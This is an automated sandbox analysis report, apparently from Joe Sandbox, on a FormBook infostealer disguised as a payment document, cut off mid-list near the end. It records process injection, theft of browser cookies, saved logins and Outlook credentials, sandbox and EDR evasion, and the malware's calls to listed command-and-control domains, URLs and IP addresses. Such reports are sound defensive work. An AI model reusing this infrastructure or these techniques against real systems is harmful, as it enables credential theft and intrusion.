                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B87B1 LogonUserW,0_2_005B87B1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00563B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00563B3A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005648D7
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C4C53 mouse_event,0_2_005C4C53
                Source: C:\Users\user\Desktop\Latest advice payment.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Latest advice payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_005B7CAF
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005B874B
                Source: Latest advice payment.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: Latest advice payment.exe, CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058862B cpuid 0_2_0058862B
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00594E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00594E87
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005A1E06 GetUserNameW,0_2_005A1E06
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00593F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00593F3A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005649A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Latest advice payment.exeBinary or memory string: WIN_81
                Source: Latest advice payment.exeBinary or memory string: WIN_XP
                Source: Latest advice payment.exeBinary or memory string: WIN_XPe
                Source: Latest advice payment.exeBinary or memory string: WIN_VISTA
                Source: Latest advice payment.exeBinary or memory string: WIN_7
                Source: Latest advice payment.exeBinary or memory string: WIN_8
                Source: Latest advice payment.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2436623897.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_005D6283
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_005D6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567859 Sample: Latest advice payment.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 28 www.soainsaat.xyz 2->28 30 www.amayavp.xyz 2->30 32 11 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 7 other signatures 2->50 10 Latest advice payment.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 CWtKbasqHVKAO.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 bitsadmin.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 CWtKbasqHVKAO.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.amayavp.xyz 185.27.134.144, 49965, 49970, 49977 WILDCARD-ASWildcardUKLimitedGB United Kingdom 22->34 36 www.xcvbj.asia 149.88.81.190, 49889, 49895, 49900 SAIC-ASUS United States 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Latest advice payment.exe47%ReversingLabsWin32.Trojan.AutoitInject
                Latest advice payment.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P100%Avira URL Cloudmalware
                http://www.learnwithus.site0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/100%Avira URL Cloudmalware
                http://www.laohub10.net/sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5P0%Avira URL Cloudsafe
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2100%Avira URL Cloudmalware
                http://www.learnwithus.site/alu5/0%Avira URL Cloudsafe
                https://login.livnn0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.learnwithus.site
                		209.74.77.107
                		truefalse
                  		high
                  www.vayui.top
                  		172.67.145.234
                  		truefalse
                    		high
                    www.amayavp.xyz
                    		185.27.134.144
                    		truefalse
                      		high
                      r0lqcud7.nbnnn.xyz
                      		27.124.4.246
                      		truefalse
                        		high
                        www.xcvbj.asia
                        		149.88.81.190
                        		truefalse
                          		high
                          www.rgenerousrs.store
                          		172.67.167.146
                          		truefalse
                            		high
                            www.nb-shenshi.buzz
                            		161.97.168.245
                            		truefalse
                              		high
                              natroredirect.natrocdn.com
                              		85.159.66.93
                              		truefalse
                                		high
                                www.t91rl7.pro
                                		154.88.22.101
                                		truefalse
                                  		high
                                  www.laohub10.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.cuthethoi.online
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.soainsaat.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.soainsaat.xyz/rum2/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.rgenerousrs.store/o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.laohub10.net/sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.vayui.top/vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nb-shenshi.buzz/xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5Ptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.laohub10.net/sgdd/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.vayui.top/vg0z/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.t91rl7.pro/jhb8/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.rgenerousrs.store/o362/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.learnwithus.site/alu5/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.xcvbj.asia/rq1s/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.amayavp.xyz/d9ku/true
                                        • Avira URL Cloud: malware
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabbitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://server/get.aspsvchost.exe, 00000002.00000003.2400399529.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400509585.0000000002E48000.00000004.00000020.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000002.3990744598.0000000000B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.learnwithus.siteCWtKbasqHVKAO.exe, 0000000C.00000002.3993071436.00000000057B5000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.ecosia.org/newtab/bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ac.ecosia.org/autocomplete?q=bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2bitsadmin.exe, 00000008.00000002.3991882171.000000000411C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000008.00000002.3993392825.00000000060D0000.00000004.00000800.00020000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991649749.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 00000008.00000002.3993504611.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://login.livnnbitsadmin.exe, 00000008.00000002.3990124569.00000000005C0000.00000004.00000020.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://login.livebitsadmin.exe, 00000008.00000002.3990678417.0000000002E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.88.81.190
                                                          		www.xcvbj.asiaUnited States
                                                          		188SAIC-ASUSfalse
                                                          172.67.167.146
                                                          		www.rgenerousrs.storeUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          209.74.77.107
                                                          		www.learnwithus.siteUnited States
                                                          		31744MULTIBAND-NEWHOPEUSfalse
                                                          185.27.134.144
                                                          		www.amayavp.xyzUnited Kingdom
                                                          		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                          27.124.4.246
                                                          		r0lqcud7.nbnnn.xyzSingapore
                                                          		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                          172.67.145.234
                                                          		www.vayui.topUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          154.88.22.101
                                                          		www.t91rl7.proSeychelles
                                                          		40065CNSERVERSUSfalse
                                                          85.159.66.93
                                                          		natroredirect.natrocdn.comTurkey
                                                          		34619CIZGITRfalse
                                                          161.97.168.245
                                                          		www.nb-shenshi.buzzUnited States
                                                          		51167CONTABODEfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1567859
                                                          Start date and time:2024-12-03 23:25:59 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 48s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:13
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Latest advice payment.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@12/9
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 49
                                                          • Number of non-executed functions: 280
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • VT rate limit hit for: Latest advice payment.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          No simulations

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.88.81.190Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/hkgx/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/hkgx/
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • www.xcvbj.asia/rq1s/
                                                          172.67.167.146Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • www.rgenerousrs.store/8gp4/
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
